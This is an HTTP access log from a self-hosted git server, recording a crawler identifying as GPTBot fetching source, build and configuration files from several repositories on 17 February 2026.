"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:15:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 23713] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:15:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" +[17/Feb/2026:15:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13095] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13626] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10501] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:15:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10446] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11012] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11600] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13337] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13338] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11597] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12217] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:16:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" +[17/Feb/2026:16:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" +[17/Feb/2026:16:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:00:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProperties" [Client 74.7.227.38] [Length 21741] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor" [Client 74.7.227.38] [Length 13083] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:16:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13094] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:16:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 